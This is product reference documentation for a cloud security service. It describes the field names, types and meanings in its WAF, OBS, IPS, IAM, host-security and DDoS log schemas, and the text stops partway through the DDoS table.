Log Fields
If you access WAF, HSS, CFW, CTS, and IPS logs through the console, SecMaster adds information such as log sources and timestamps to these logs in the form of key-value pairs.
This section describes the meaning of each field.
- Common Fields: describes common fields.
- sec-waf-attack: describes the fields in WAF attack logs.
- sec-waf-access: describes the fields in WAF access logs.
- sec-obs-access: describes the fields in OBS access logs.
- sec-nip-attack: describes the fields in IPS attack logs.
- sec-iam-audit: describes the fields in IAM audit logs.
- sec-hss-vul: describes the fields in the HSS host vulnerability scan result.
- sec-hss-alarm: describes the fields in the HSS host security alerts.
- sec-hss-log: describes the fields in the HSS host security logs.
- sec-ddos-attack: describes the fields in the DDoS attack logs.
- sec-cts-audit: describes the fields in the CTS logs.
- sec-cfw-risk: describes the fields in the CFW attack incident logs.
- sec-cfw-flow: describes the fields in the CFW traffic logs.
- sec-cfw-block: describes the fields in the CFW access control logs.
- sec-apig-access: describes the fields in the API Gateway access logs.
- sec-dbss-alarm: describes the fields in the DBSS alert logs.
- sec-dsc-alarm: describes the fields in the DSC alert logs.
Common Fields
Parameter |
Field Type |
Description |
---|---|---|
__time |
Date |
Time when a log is generated |
__raw |
String |
Raw log |
ops.source |
String |
Data source |
ops.rgn |
String |
Site |
ops.csvc |
String |
Data source (cloud service) |
ops.ver |
String |
Data warehouse version |
ops.hash |
String |
Integrity verification of extend hash value of original |
[src_/dest_]asset.domain.id |
String |
Domain ID |
[src_/dest_]asset.domain.name |
String |
Domain name |
[src_/dest_]asset.id |
String |
Asset ID |
[src_/dest_]asset.name |
String |
Asset name |
[src_/dest_]asset.type |
String |
Asset type |
[src./dest.]asset.region |
String |
Asset site |
[src_/dest_]geo.ip |
String |
IP address |
[src_/dest_]geo.country |
String |
Country name (Chinese) |
[src_/dest_]geo.prov |
String |
Province name (Chinese) |
[src_/dest_]geo.city |
String |
City name (Chinese) |
[src_/dest_]geo.org |
String |
Organization that registers the IP address |
[src_/dest_]geo.isp |
String |
Carrier |
[src_/dest_]geo.loc.lat |
Float |
Latitude |
[src_/dest_]geo.loc.lon |
Float |
Longitude |
[src_/dest_]geo.tz |
Integer |
Time zone |
[src_/dest_]geo.utc_off |
Integer |
Time zone |
[src_/dest_]geo.cac |
String |
Time zone |
[src_/dest_]geo.iddc |
String |
International call prefix code |
[src_/dest_]geo.cc |
String |
Country code (ISO) |
[src_/dest_]geo.contc |
String |
Continental code (ISO) |
[src_/dest_]geo.idc |
String |
Data center (equipment room) |
[src_/dest_]geo.bs |
String |
Mobile base station |
[src_/dest_]geo.cc3 |
String |
Country code (3 digits) |
[src_/dest_]geo.euro |
String |
EU member states |
sec-waf-attack
Fields in WAF attack logs
Field |
Type |
Description |
|
---|---|---|---|
category |
String |
Category. The value is attack. |
|
time |
Date |
Log time. |
|
time_iso8601 |
Date |
ISO 8601 time of the log. |
|
policy_id |
String |
Protection policy ID. |
|
level |
Integer |
Protection policy level. The value can be 1 (loose), 2 (medium), or 3 (strict). |
|
attack |
String |
Attack type The value can be:
|
|
action |
String |
Processing action. The value can be:
|
|
rule |
String |
ID of the triggered rule or the description of the custom policy type. |
|
sub_type |
String |
When attack is set to robot, this field cannot be left blank. It indicates the subtype of a crawler.
|
|
location |
String |
Location of the triggered payload. |
|
resp_headers |
String |
Response header. |
|
resp_body |
String |
Response body. |
|
hit_data |
String |
Triggered payload string. |
|
status |
String |
Status code of the response to the request. |
|
reqid |
String |
Random ID. |
|
id |
String |
Attack ID. |
|
method |
String |
Request method. |
|
sip |
String |
Request IP address of the client. |
|
sport |
String |
Request port of the client. |
|
host |
String |
Domain name of the requested server. |
|
http_host |
String |
Port number of the requested server. |
|
uri |
String |
Request URL. |
|
header |
String |
Request header information. |
|
mutipart |
String |
Request multipart header (file upload). |
|
cookie |
String |
Request cookie. |
|
params |
String |
Parameters following the request URI. |
|
body_bytes_sent |
String |
Total number of bytes of the response body sent to the client. |
|
upstream_response_time |
String |
Response time of the backend server. |
|
process_time |
String |
Detection duration of the engine. |
|
engine_id |
String |
Unique ID of the engine. |
|
group_id |
String |
Log group ID used for interconnecting with LTS. |
|
attack_stream_id |
String |
ID of access_stream of the user in the log group identified by the group_id field. |
|
hostid |
String |
ID of a protected domain name. |
|
tenantid |
String |
Tenant ID of the protected domain name. |
|
projectid |
String |
Project ID of the protected domain name. |
|
backend |
Object |
Address of the backend server to which the request is forwarded. |
|
backend |
type |
String |
Backend host type (IP address or domain name). |
alive |
String |
Backend host status. |
|
host |
String |
Backend host value. |
|
protocol |
String |
Backend protocol. |
|
port |
Integer |
Backend port. |
sec-waf-access
Table 3 describes the fields in WAF access logs.
Field |
Type |
Description |
---|---|---|
requestid |
String |
Random ID |
time |
Date |
Log time |
eng_ip |
String |
Engine IP address |
hostid |
String |
ID of a protected domain name |
tenantid |
String |
Tenant ID of the protected domain name |
projectid |
String |
Project ID of the protected domain name |
remote_ip |
String |
IP address of the client that sends the request |
scheme |
String |
Request protocol type |
response_code |
String |
Response code of a request |
method |
String |
Request method |
http_host |
String |
Domain name of the requested server |
url |
String |
Request URL |
request_length |
String |
Request length |
bytes_send |
String |
Total number of bytes sent to the client |
body_bytes_sent |
String |
Total number of bytes of the response body sent to the client |
upstream_addr |
String |
IP address of the selected backend server |
request_time |
String |
Request processing time, which starts from the first byte sent from the client |
upstream_response_time |
String |
Response time of the backend server |
upstream_status |
String |
Response code of the backend server |
upstream_connect_time |
String |
Duration for connecting to the backend server |
upstream_header_time |
String |
Time used by the backend server to receive the first byte of the response header |
bind_ip |
String |
Retrieval IP address of the engine |
engine_id |
String |
Unique ID of the engine |
time_iso8601 |
Date |
ISO 8601 time of the log |
sni |
String |
Domain name requested through the SNI |
tls_version |
String |
Version of the protocol used to establish an SSL connection |
ssl_curves |
String |
List of curves supported by the client |
ssl_session_reused |
String |
Whether an SSL session is reused
|
process_time |
String |
Detection duration of the engine |
x_forwarded_for |
String |
Content of X-Forwarded-For in the request header |
cdn_src_ip |
String |
Content of Cdn-Src-Ip in the request header |
x_real_ip |
String |
Content of X-Real-Ip in the request header |
sec-obs-access
Fields in OBS access logs
Field |
Type |
Description |
---|---|---|
srcip |
String |
Source IP address for accessing OBS. |
srcport |
String |
Source port for accessing OBS. |
logtime |
Date |
Time when the log is generated. |
ces_log_version |
String |
Version number, which is V0 for an internal request. V0 does not record Cloud Eye audit logs, and V1 records Cloud Eye audit logs. |
request_start_time |
String |
Request start time. |
ctx_request_id |
String |
Request ID, which uniquely identifies a request to be traced. |
request_method |
String |
Request method (GET/POST). |
remote_ip |
String |
Remote IP address, in the format of Client IP address:Port number. |
operation |
String |
Operation type, for example, GET.OBJECT. |
bucket_name |
String |
Bucket name. |
object_name |
String |
Object name (file name). |
query_string |
String |
Request query. |
http_status |
String |
HTTP request status code, for example, 200. |
content_length |
String |
Length of the requested content. |
user_agent |
String |
Client agent. |
storage_class |
String |
OBS storage class. |
user_name |
String |
Username of the requester. |
user_id |
String |
User ID of the requester. |
domain_name |
String |
Domain name of the requester. |
domain_id |
String |
Domain ID of the requester. |
project_id |
String |
Project ID of the requester. |
owner_domain_name |
String |
Tenant name of the bucket owner. |
owner_domain_id |
String |
Tenant ID of the bucket owner. |
owner_project_id |
String |
Project ID of the bucket owner. |
transmission_type |
String |
Network type. The value can be:
|
scheme |
String |
Network protocol. |
http_version |
String |
HTTP version. |
host |
String |
OBS domain name. |
port |
String |
Port number. |
auth_v2_v4 |
String |
Authentication mode. |
host_type |
String |
Access type. |
x_forwarded_for |
String |
IP address of the proxy client. |
pub_bkt |
String |
Whether the bucket is accessed anonymously. |
pub_obj |
String |
Whether an object is accessed anonymously. |
website_req |
String |
Whether the request is a website request. |
crr_req |
String |
Whether the request is a CRR request. |
huawei_cloud_service |
String |
Whether the request is a CDN request.
|
batch_delete_success_count |
String |
Number of successful batch deletions. |
ctc_log_urn |
String |
Agency. |
requester |
String |
Agency account. |
is_over_write |
String |
Whether to overwrite data. |
error_code |
String |
Cause of an error. |
detail_error_code |
String |
Detailed error cause. |
request_content_type |
String |
Request object type. |
request_content_md5 |
String |
MD5 of the request object. |
total_bytes_received |
String |
Total bytes of received content. |
response_content_type |
String |
Response object type. |
total_bytes_sent |
String |
Total bytes of sent content in the response header and response body. |
referrer |
String |
Reference page. |
index_read_count |
String |
Metadata table query latency. |
persistence_read_count |
String |
Number of times that data is read. |
vpc_id |
String |
ID of the VPC to which the request client belongs. |
access_with_security_token |
String |
Access using the STS token. |
copy_size |
String |
Copy size. |
vpcep_traffic |
String |
Transmission through VPCEP. |
access_key |
String |
AK. |
sec-nip-attack
Fields in IPS attack logs
Field |
Type |
Description |
---|---|---|
SyslogId |
String |
Log serial number (SN). |
Vsys |
String |
Virtual system name. |
Policy |
String |
Name of a security policy. |
SrcIp |
String |
Source IP address of a packet. |
DstIp |
String |
Destination IP address of a packet. |
SrcPort |
String |
Source port of a packet. For an ICMP packet, the value of this field is 0. |
DstPort |
String |
Destination port of a packet. For an ICMP packet, the value of this field is 0. |
SrcZone |
String |
Source security zone of a packet. |
DstZone |
String |
Destination security zone of a packet. |
User |
String |
Username. |
Protocol |
String |
Protocol of the packet detected by a signature. |
Application |
String |
Application that the packet detected by a signature belongs to. |
Profile |
String |
Name of a configuration file. |
SignName |
String |
Name of a signature. |
SignId |
String |
ID of a signature. |
EventNum |
String |
The field is used for log mergence. Whether logs are merged is determined by the mergence frequency and conditions. The value is 1 if logs are not merged. |
Target |
String |
Object attacked by the packet detected by a signature. The value can be:
|
Severity |
String |
Severity of the attack caused by the packet detected by a signature. The value can be:
|
Os |
String |
OS attacked by the packet detected by a signature. The value can be:
|
Category |
String |
Threat type of the detected attack packet features. |
Action |
String |
Signature action.
|
Reference |
String |
Reference information about the signature. |
Extend |
String |
Evidence collection field in enhanced mode. |
sec-iam-audit
Fields in IAM audit logs
Field |
Type |
Description |
---|---|---|
uid |
String |
User ID |
un |
String |
Username |
did |
String |
Domain ID |
dn |
String |
Domain name |
src |
String |
Request domain name |
opl |
String |
Operation level |
op |
String |
Operation type |
res |
String |
IAM service invoking result |
ter |
String |
Source IP address |
dtl |
String |
IAM authentication details |
tn |
Date |
Occurrence time |
ts |
Long |
Timestamp when the IAM service is invoked |
tid |
String |
Trace ID |
evnt |
String |
Incident |
tobj |
String |
Service |
sec-hss-vul
Fields in HSS vulnerability scanning results
Field |
Type |
Description |
|
---|---|---|---|
agentUuid |
String |
Agent UUID. |
|
alarmCsn |
String |
Alert UUID, which is randomly generated when the master generates an alert. |
|
alarmKey |
String |
Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master. |
|
alarmVersion |
String |
Agent version. |
|
occurTime |
Int64 |
Vulnerability detection time (ms). |
|
severity |
Int32 |
Vulnerability level defined by HSS. |
|
hostUuid |
String |
UUID of the affected host. |
|
hostName |
String |
Name of the affected host. |
|
hostIp |
String |
Communication IP address of the affected host. |
|
ipList |
String |
List of IP addresses of affected hosts. |
|
cloudId |
String |
Cloud agent SN. |
|
region |
String |
Region where the affected host is located. |
|
projectId |
String |
ID of the affected tenant. |
|
enterpriseProjectId |
String |
ID of the affected enterprise tenant. |
|
appendInfo |
Object |
Vulnerability details. |
|
appendInfo |
vulId |
String |
Official vulnerability ID. |
type |
Int32 |
Vulnerability type. The value can be:
|
|
repairNecessity |
Int32 |
Necessity level of vulnerability fixing. The value can be:
|
|
status |
Int32 |
Reserved field. |
|
cve_ids |
String |
CVE ID list. Use commas (,) to separate CVE IDs. |
|
url |
String |
URL of the official website where the vulnerability details are available. |
|
vulNameEn |
String |
Vulnerability name in English. |
|
vulNameCn |
String |
Vulnerability name in Chinese. |
|
severityLevel |
String |
Vulnerability severity. The options are as follows:
|
|
descriptionEn |
String |
Vulnerability description in English. |
|
descriptionCn |
String |
Vulnerability description in Chinese. |
|
solutionEn |
String |
Solution description in English. |
|
solutionCn |
String |
Solution description in Chinese. |
|
repairCmd |
String |
Fix command. |
|
needBoot |
Int32 |
Whether to restart the system. The default value is 1, which means not to restart the system. |
|
errorInfo |
String |
Fix failure cause. |
|
appName |
String |
Name of the software that has the vulnerability (only for Linux vulnerabilities). |
|
version |
String |
Version of the software that has the vulnerability (only for Linux vulnerabilities). |
|
createTime |
Int64 |
First detection time (ms). |
|
updateTime |
Int64 |
Vulnerability fixing time (ms). The initial value is the same as that of createTime. |
|
agentId |
String |
UUID of the associated host agent. |
|
projectId |
String |
ID of the affected tenant. |
sec-hss-alarm
Fields in HSS alert logs
Field |
Type |
Description |
||
---|---|---|---|---|
agentUuid |
String |
Agent UUID. |
||
alarmCsn |
String |
Alert UUID. |
||
alarmKey |
String |
Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master. |
||
alarmVersion |
String |
Agent version. |
||
occurTime |
Long |
Incident occurrence time (accurate to millisecond). |
||
severity |
Long |
Severity. |
||
hostUuid |
String |
UUID of the affected host. |
||
hostName |
String |
Name of the affected host. |
||
hostIp |
String |
Communication IP address of the affected host. |
||
ipList |
String |
List of IP addresses of affected hosts. |
||
cloudId |
String |
Cloud agent SN. |
||
region |
String |
Region where the affected host is located. |
||
projectId |
String |
ID of the affected tenant. |
||
enterpriseProjectId |
String |
ID of the affected enterprise tenant. |
||
appendInfo |
Object |
Alert details. |
||
appendInfo |
agent_id |
String |
Agent ID. |
|
version |
String |
Incident version. |
||
container_name |
String |
Container ID (in container security scenarios). |
||
image_name |
String |
Image name (in container security scenarios). |
||
event_id |
String |
Incident ID (GUID). |
||
event_name |
String |
Incident name. |
||
event_classid |
String |
Unique incident ID. |
||
occur_time |
Long |
Occurrence time (accurate to second). |
||
recent_time |
Long |
Last occurrence time (accurate to second). |
||
event_category |
Integer |
Incident category. |
||
event_type |
Integer |
Incident type. |
||
event_count |
Integer |
Number of incidents. |
||
severity |
Integer |
Severity. |
||
attack_phase |
Integer |
Attack phase. |
||
attack_tag |
Integer |
Attack tag. |
||
confidence |
Integer |
Confidence. |
||
action |
Integer |
Action. |
||
detect_module |
String |
Detection module. |
||
report_source |
String |
Report source. |
||
related_events |
String |
Related incident ID. |
||
resource_info |
Object |
Resource information. |
||
network_info |
Object |
Network information. |
||
app_info |
Object |
Application information. |
||
system_info |
Object |
System information. |
||
process_info |
list |
Process information. |
||
user_info |
list |
User information. |
||
file_info |
list |
File information. |
||
geo_info |
Object |
Geographic information. |
||
malware_info |
Object |
Malware information. |
||
forensic_info |
String |
Evidence collection field. |
||
recommendation |
String |
Handling suggestions. |
||
extend_info |
String |
Extended incident information. |
||
resource_info |
project_id |
String |
Project ID. |
|
region_name |
String |
Region name. |
||
vpc_id |
String |
VPC ID. |
||
host_name |
String |
Host name. |
||
host_ip |
String |
Host IP address. |
||
host_id |
String |
Host ID (ECS ID). |
||
cloud_id |
String |
Cloud agent SN. |
||
vm_name |
String |
VM name. |
||
vm_uuid |
String |
VM UUID. |
||
container_id |
String |
Container ID. |
||
image_id |
String |
Image ID. |
||
sys_arch |
String |
System CPU architecture. |
||
os_bit |
String |
OS bit version. |
||
os_type |
String |
OS type. |
||
os_name |
String |
OS name. |
||
os_version |
String |
OS version. |
||
network_info |
local_address |
String |
Local address. |
|
local_port |
Integer |
Local port. |
||
remote_address |
String |
Remote address. |
||
remote_port |
Integer |
Remote port. |
||
src_ip |
String |
Source IP address. |
||
src_port |
Integer |
Source port. |
||
src_domain |
String |
Source domain. |
||
dest_ip |
String |
Destination IP address. |
||
dest_port |
Integer |
Destination port. |
||
dest_domain |
String |
Destination domain. |
||
protocol |
String |
Protocol. |
||
app_protocol |
String |
Application layer protocol. |
||
flow_direction |
String |
Flow direction. |
||
app_info |
sql |
String |
Executed SQL statement. |
|
domain_name |
String |
DNS domain name. |
||
url_path |
String |
URL. |
||
url_method |
String |
URL method. |
||
req_refer |
String |
URL request referrer. |
||
email_subject |
String |
Email subject. |
||
email_sender |
String |
Email sender. |
||
email_receiver |
String |
Email recipient. |
||
email_keyword |
String |
Email keyword. |
||
process_info |
process_name |
String |
Process name. |
|
process_path |
String |
Process file path. |
||
process_pid |
Integer |
Process ID. |
||
process_uid |
Integer |
Process user ID. |
||
process_username |
String |
Process username. |
||
process_cmdline |
String |
Process file command line. |
||
process_filename |
String |
Process file name. |
||
process_start_time |
Long |
Process start time. |
||
process_gid |
Integer |
Process group ID. |
||
process_egid |
Integer |
Effective process group ID. |
||
process_euid |
Integer |
Effective process user ID. |
||
parent_process_name |
String |
Parent process name. |
||
parent_process_path |
String |
Parent process file path. |
||
parent_process_pid |
Integer |
Parent process ID. |
||
parent_process_uid |
Integer |
Parent process user ID. |
||
parent_process_cmdline |
String |
Parent process file command line. |
||
parent_process_filename |
String |
Parent process file name. |
||
parent_process_start_time |
Long |
Parent process start time. |
||
parent_process_gid |
Integer |
Parent process group ID. |
||
parent_process_egid |
Integer |
Effective parent process group ID. |
||
parent_process_euid |
Integer |
Effective parent process user ID. |
||
child_process_name |
String |
Subprocess name. |
||
child_process_path |
String |
Subprocess file path. |
||
child_process_pid |
Integer |
Subprocess ID. |
||
child_process_uid |
Integer |
Subprocess user ID. |
||
child_process_cmdline |
String |
Subprocess file command line. |
||
child_process_filename |
String |
Subprocess file name. |
||
child_process_start_time |
Long |
Subprocess start time. |
||
child_process_gid |
Integer |
Subprocess group ID. |
||
child_process_egid |
Integer |
Effective subprocess group ID. |
||
child_process_euid |
Integer |
Effective subprocess user ID. |
||
virt_cmd |
String |
Virtualization command. |
||
virt_process_name |
String |
Virtualization process name. |
||
escape mode |
String |
Escape mode. |
||
escape cmd |
String |
Command executed after the escape. |
||
user_info |
user_id |
Integer |
User ID. |
|
user_gid |
Integer |
User GID. |
||
user_name |
String |
Username. |
||
user_group_name |
String |
User group name. |
||
user_home_dir |
String |
User home directory. |
||
login_ip |
String |
User login IP address. |
||
service_type |
String |
Login service type. |
||
service_port |
Integer |
Login service port. |
||
login_mode |
String |
Login mode. |
||
login_lasttime |
Long |
Last login time of a user. |
||
login_fail_count |
Integer |
Failed login attempts. |
||
pwd_hash |
String |
Password hash. |
||
pwd_with_fuzzing |
String |
Anonymized password. |
||
pwd_used_days |
Integer |
Password age (days). |
||
pwd_min_days |
Integer |
Minimum password validity period. |
||
pwd_max_days |
Integer |
Maximum password validity period. |
||
pwd_warn_left_days |
Integer |
Advance warning of password expiration (days). |
||
file_info |
file_path |
String |
File path/name. |
|
file_alias |
String |
File alias. |
||
file_size |
Integer |
File size. |
||
file_mtime |
Long |
Time when the file is last modified. |
||
file_atime |
Long |
Time when the file is last accessed. |
||
file_ctime |
Long |
Time when the file status last changes. |
||
file_hash |
String |
File hash value. |
||
file_md5 |
String |
File MD5 value. |
||
file_sha256 |
String |
File SHA256 value. |
||
file_type |
String |
File type. |
||
file_content |
String |
File content. |
||
file_attr |
String |
File attribute. |
||
file_operation |
String |
File operation type. |
||
file_change_attr |
String |
Old/New attribute. |
||
file_new_path |
String |
New file path. |
||
file_desc |
String |
File description. |
||
file_key_word |
String |
File keyword. |
||
is_dir |
Boolean |
Whether the file is a directory. |
||
fd_info |
String |
File handle information. |
||
fd_count |
Integer |
Number of file handles. |
||
forensic_info |
monitor_process |
String |
Monitoring process. |
|
escape_mode |
String |
Escape mode. |
||
abnormal_port |
String |
Abnormal port. |
||
geo_info |
src_country |
String |
Source country/region. |
|
src_city |
String |
Source city. |
||
src_latitude |
Long |
Source latitude. |
||
src_longitude |
Long |
Source longitude. |
||
dest_country |
String |
Destination country/region. |
||
dest_city |
String |
Destination city. |
||
dest_latitude |
Long |
Destination latitude. |
||
dest_longitude |
Long |
Destination longitude. |
||
malware_info |
malware_family |
String |
Malware family. |
|
malware_class |
String |
Malware classification. |
||
system_info |
pwd_valid |
Boolean |
Whether the password is valid. |
|
pwd_min_len |
Integer |
Password length. |
||
pwd_digit_credit |
Integer |
Digits contained in the password. |
||
pwd_uppercase_letter |
Integer |
Uppercase letters contained in the password. |
||
pwd_lowercase_letter |
Integer |
Lowercase letters contained in the password. |
||
pwd_special_characters |
Integer |
Special characters contained in the password. |
||
extend_info |
hit_rule |
String |
Hit rule. |
|
rule_name |
String |
Rule name. |
||
rulesetname |
String |
Rule set name. |
||
report_type |
String |
Reported data type. |
||
ti_info |
ti_source |
String |
Intelligence source. |
|
ti_class |
String |
Intelligence classification. |
||
ti_threat_type |
String |
Intelligence threat type. |
||
ti_first_time |
Long |
First detection time. |
||
ti_last_time |
Long |
Last detection time. |
sec-hss-log
Fields in HSS security logs
Field |
Type |
Description |
||
---|---|---|---|---|
agentUuid |
String |
Agent UUID. |
||
alarmCsn |
String |
Alert UUID. |
||
alarmKey |
String |
Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master. |
||
alarmVersion |
String |
Agent version. |
||
occurTime |
Long |
Incident occurrence time (accurate to millisecond). |
||
severity |
Long |
Severity. |
||
hostUuid |
String |
UUID of the affected host. |
||
hostName |
String |
Name of the affected host. |
||
hostIp |
String |
Communication IP address of the affected host. |
||
ipList |
String |
List of IP addresses of affected hosts. |
||
cloudId |
String |
Cloud agent SN. |
||
region |
String |
Region where the affected host is located. |
||
projectId |
String |
ID of the affected tenant. |
||
enterpriseProjectId |
String |
ID of the affected enterprise tenant. |
||
appendInfo |
Object |
Alert details. |
||
appendInfo |
agent_id |
String |
Agent ID. |
|
version |
String |
Incident version. |
||
container_name |
String |
Container ID (in container security scenarios). |
||
image_name |
String |
Image name (in container security scenarios). |
||
event_id |
String |
Incident ID (GUID). |
||
event_name |
String |
Incident name. |
||
event_classid |
String |
Unique incident ID. |
||
occur_time |
Long |
Occurrence time (accurate to second). |
||
recent_time |
Long |
Last occurrence time (accurate to second). |
||
event_category |
Integer |
Incident category. |
||
event_type |
Integer |
Incident type. |
||
event_count |
Integer |
Number of incidents. |
||
severity |
Integer |
Severity. |
||
attack_phase |
Integer |
Attack phase. |
||
attack_tag |
Integer |
Attack tag. |
||
confidence |
Integer |
Confidence. |
||
action |
Integer |
Action. |
||
detect_module |
String |
Detection module. |
||
report_source |
String |
Report source. |
||
related_events |
String |
Related incident ID. |
||
resource_info |
Object |
Resource information. |
||
network_info |
Object |
Network information. |
||
app_info |
Object |
Application information. |
||
system_info |
Object |
System information. |
||
process_info |
list |
Process information. |
||
user_info |
list |
User information. |
||
file_info |
list |
File information. |
||
geo_info |
Object |
Geographic information. |
||
malware_info |
Object |
Malware information. |
||
forensic_info |
String |
Evidence collection field. |
||
recommendation |
String |
Handling suggestions. |
||
extend_info |
String |
Extended incident information. |
||
resource_info |
project_id |
String |
Project ID. |
|
region_name |
String |
Region name. |
||
vpc_id |
String |
VPC ID. |
||
host_name |
String |
Host name. |
||
host_ip |
String |
Host IP address. |
||
host_id |
String |
Host ID (ECS ID). |
||
cloud_id |
String |
Cloud agent SN. |
||
vm_name |
String |
VM name. |
||
vm_uuid |
String |
VM UUID. |
||
container_id |
String |
Container ID. |
||
image_id |
String |
Image ID. |
||
sys_arch |
String |
System CPU architecture. |
||
os_bit |
String |
OS bit version. |
||
os_type |
String |
OS type. |
||
os_name |
String |
OS name. |
||
os_version |
String |
OS version. |
||
network_info |
local_address |
String |
Local address. |
|
local_port |
Integer |
Local port. |
||
remote_address |
String |
Remote address. |
||
remote_port |
Integer |
Remote port. |
||
src_ip |
String |
Source IP address. |
||
src_port |
Integer |
Source port. |
||
src_domain |
String |
Source domain. |
||
dest_ip |
String |
Destination IP address. |
||
dest_port |
Integer |
Destination port. |
||
dest_domain |
String |
Destination domain. |
||
protocol |
String |
Protocol. |
||
app_protocol |
String |
Application layer protocol. |
||
flow_direction |
String |
Flow direction. |
||
app_info |
sql |
String |
Executed SQL statement. |
|
domain_name |
String |
DNS domain name. |
||
url_path |
String |
URL. |
||
url_method |
String |
URL method. |
||
req_refer |
String |
URL request referrer. |
||
email_subject |
String |
Email subject. |
||
email_sender |
String |
Email sender. |
||
email_receiver |
String |
Email recipient. |
||
email_keyword |
String |
Email keyword. |
||
process_info |
process_name |
String |
Process name. |
|
process_path |
String |
Process file path. |
||
process_pid |
Integer |
Process ID. |
||
process_uid |
Integer |
Process user ID. |
||
process_username |
String |
Process username. |
||
process_cmdline |
String |
Process file command line. |
||
process_filename |
String |
Process file name. |
||
process_start_time |
Long |
Process start time. |
||
process_gid |
Integer |
Process group ID. |
||
process_egid |
Integer |
Effective process group ID. |
||
process_euid |
Integer |
Effective process user ID. |
||
parent_process_name |
String |
Parent process name. |
||
parent_process_path |
String |
Parent process file path. |
||
parent_process_pid |
Integer |
Parent process ID. |
||
parent_process_uid |
Integer |
Parent process user ID. |
||
parent_process_cmdline |
String |
Parent process file command line. |
||
parent_process_filename |
String |
Parent process file name. |
||
parent_process_start_time |
Long |
Parent process start time. |
||
parent_process_gid |
Integer |
Parent process group ID. |
||
parent_process_egid |
Integer |
Effective parent process group ID. |
||
parent_process_euid |
Integer |
Effective parent process user ID. |
||
child_process_name |
String |
Subprocess name. |
||
child_process_path |
String |
Subprocess file path. |
||
child_process_pid |
Integer |
Subprocess ID. |
||
child_process_uid |
Integer |
Subprocess user ID. |
||
child_process_cmdline |
String |
Subprocess file command line. |
||
child_process_filename |
String |
Subprocess file name. |
||
child_process_start_time |
Long |
Subprocess start time. |
||
child_process_gid |
Integer |
Subprocess group ID. |
||
child_process_egid |
Integer |
Effective subprocess group ID. |
||
child_process_euid |
Integer |
Effective subprocess user ID. |
||
virt_cmd |
String |
Virtualization command. |
||
virt_process_name |
String |
Virtualization process name. |
||
escape mode |
String |
Escape mode. |
||
escape cmd |
String |
Command executed after the escape. |
||
user_info |
user_id |
Integer |
User ID. |
|
user_gid |
Integer |
User GID. |
||
user_name |
String |
Username. |
||
user_group_name |
String |
User group name. |
||
user_home_dir |
String |
User home directory. |
||
login_ip |
String |
User login IP address. |
||
service_type |
String |
Login service type. |
||
service_port |
Integer |
Login service port. |
||
login_mode |
String |
Login mode. |
||
login_lasttime |
Long |
Last login time of a user. |
||
login_fail_count |
Integer |
Failed login attempts. |
||
pwd_hash |
String |
Password hash. |
||
pwd_with_fuzzing |
String |
Anonymized password. |
||
pwd_used_days |
Integer |
Password age (days). |
||
pwd_min_days |
Integer |
Minimum password validity period. |
||
pwd_max_days |
Integer |
Maximum password validity period. |
||
pwd_warn_left_days |
Integer |
Advance warning of password expiration (days). |
||
file_info |
file_path |
String |
File path/name. |
|
file_alias |
String |
File alias. |
||
file_size |
Integer |
File size. |
||
file_mtime |
Long |
Time when the file is last modified. |
||
file_atime |
Long |
Time when the file is last accessed. |
||
file_ctime |
Long |
Time when the file status last changes. |
||
file_hash |
String |
File hash value. |
||
file_md5 |
String |
File MD5 value. |
||
file_sha256 |
String |
File SHA256 value. |
||
file_type |
String |
File type. |
||
file_content |
String |
File content. |
||
file_attr |
String |
File attribute. |
||
file_operation |
String |
File operation type. |
||
file_change_attr |
String |
Old/New attribute. |
||
file_new_path |
String |
New file path. |
||
file_desc |
String |
File description. |
||
file_key_word |
String |
File keyword. |
||
is_dir |
Boolean |
Whether the file is a directory. |
||
fd_info |
String |
File handle information. |
||
fd_count |
Integer |
Number of file handles. |
||
forensic_info |
monitor_process |
String |
Monitoring process. |
|
escape_mode |
String |
Escape mode. |
||
abnormal_port |
String |
Abnormal port. |
||
geo_info |
src_country |
String |
Source country/region. |
|
src_city |
String |
Source city. |
||
src_latitude |
Long |
Source latitude. |
||
src_longitude |
Long |
Source longitude. |
||
dest_country |
String |
Destination country/region. |
||
dest_city |
String |
Destination city. |
||
dest_latitude |
Long |
Destination latitude. |
||
dest_longitude |
Long |
Destination longitude. |
||
malware_info |
malware_family |
String |
Malware family. |
|
malware_class |
String |
Malware classification. |
||
system_info |
pwd_valid |
Boolean |
Whether the password is valid. |
|
pwd_min_len |
Integer |
Password length. |
||
pwd_digit_credit |
Integer |
Digits contained in the password. |
||
pwd_uppercase_letter |
Integer |
Uppercase letters contained in the password. |
||
pwd_lowercase_letter |
Integer |
Lowercase letters contained in the password. |
||
pwd_special_characters |
Integer |
Special characters contained in the password. |
||
extend_info |
hit_rule |
String |
Hit rule. |
|
rule_name |
String |
Rule name. |
||
rulesetname |
String |
Rule set name. |
||
report_type |
String |
Reported data type. |
||
ti_info |
ti_source |
String |
Intelligence source. |
|
ti_class |
String |
Intelligence classification. |
||
ti_threat_type |
String |
Intelligence threat type. |
||
ti_first_time |
Long |
First detection time. |
||
ti_last_time |
Long |
Last detection time. |
sec-ddos-attack
Fields in Anti-DDoS attack logs
Field |
Type |
Description |
---|---|---|
log_type |
String |
Log type |
time |
Date |
local time |
device_ip |
String |
Device IP address |
device_type |
String |
Device type (CLEAN: cleaning device; DETECT: detecting device) |
direction |
String |
Log direction (inbound, outbound) |
zone_id |
String |
Protected object ID |
zone_name |
String |
Protected object name |
zone_ip |
String |
IP address |
biz_id |
String |
Business ID |
is_deszone |
String |
Whether the traffic is network segment traffic (true, false) |
is_ipLocation |
String |
Whether the traffic is geographical location traffic (true, false) |
ipLocation_id |
String |
Geographical location ID |
total_pps |
String |
Total pps |
total_kbps |
String |
Total rate in kbps |
tcp_pps |
String |
Rate of TCP packets to the target (in pps) |
tcp_kbps |
String |
Rate of TCP traffic to the target (in kbps) |
tcpfrag_pps |
String |
Rate of TCP fragments to the target (in pps) |
tcpfrag_kbps |
String |
Rate of TCP fragment traffic to the target (in kbps) |
udp_pps |
String |
Rate of UDP packets to the target (in pps) |
udp_kbps |
String |
Rate of UDP traffic to the target (in kbps) |
udpfrag_pps |
String |
Rate of UDP fragments to the target (in pps) |
udpfrag_kbps |
String |
Rate of UDP fragment traffic to the target (in kbps) |
icmp_pps |
String |
Rate of ICMP packets to the target (in pps) |
icmp_kbps |
String |
Total ICMP traffic to the target (in kbps) |
other_pps |
String |
Rate of OTHER packets to the target (in pps) |
other_kbps |
String |
